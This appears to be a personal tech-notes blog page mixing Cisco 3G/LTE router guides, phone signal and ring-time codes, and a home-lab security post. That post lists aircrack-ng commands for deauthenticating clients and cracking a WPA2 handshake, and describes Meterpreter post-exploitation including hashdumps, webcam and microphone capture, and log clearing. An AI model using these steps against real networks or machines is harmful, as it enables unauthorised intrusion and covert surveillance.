Cisco with EHWIC-3G-HSPA+7 card configuration
A good site for Wiki-Cisco Linux information with regards to 3G Connections and Cisco Routers.
Megawatt Batteries
SensorIQ: https://www.silverspringnet.com/wp-content/uploads/Sensor_IQ3.0_Datasheet_2017.pdf
Check Signal Strength On Your iPhone
Launch the Phone app
Dial *3001#12345#*
Then tap on the Call button, which will launch the Field Test app (or enter the field test mode). You’ll also notice that the signal strength indicator has switched to a number from the traditional signal bar.
Now hold the Power button until the red slider (slide to power off button) appears.
Release the Power button and press the Home button until the Field Test app quits
The lower the number (in other words, the more negative) the worse the signal, and the higher the number (less negative) the better.
Anything above -80 is good, and would be considered full bars
Anything below -100 is bad, and would be considered few bars
For example, a signal number of -105 is considerably worse than a signal of -70. You’ll generally find that anything approaching -100 or lower is fairly bad reception, while anything above -80 is usually good, and if you tap the number signal it’s usually shown as full bars. The full range of the signal numbers extends from -40 to -120, with -120 being a nearly impossible number to see because it means no reception, and -40 would be about the strength you’d get being right alongside a cell tower.
Building a SPS Solution
Extend your ring time on your Telstra mobile
Extend your ring time
By default your phone rings for 15 seconds before diverting a call.
To extend the ring time, enter the following sequence on your phone, followed by the number of seconds you wish your phone to ring for, then hash.
- Press **61*101**[15, 20, 25 or 30]#.
- Press the call/send button.
For example, to make the phone ring for 20 seconds, type **61*101**20#. 30 Seconds? **61*101**30#. Easy!
To reset your phone to its original call settings, enter **004*101#.
Security insight: Cracking WPA2 and fun with Meterpreter
So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab. – so here’s the thing:
It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:
airmon–ng
airmon–ng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security. I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh…. and I cleared the logs as I left the scene – all within a couple of hours.
So keep those systems secure and up to date peeps!
LTE Configuration Guides
Configuration information to support 4G on a Cisco router.
Cisco 4G LTE Software Configuration Guide
cisco-isrs-with-4g-lte-deployment-guide
Planning Guide: Verizon Internet Access with VPN for Cisco LTE eHWIC/GRWIC/819
Central Manager Alarms
Description: Central Manager’s secure store is initialized but not opened.
Fix: Secure Shell to the device (C.M.) and open the store by using ‘cms secure-store open’ from the CLI, and enter the password.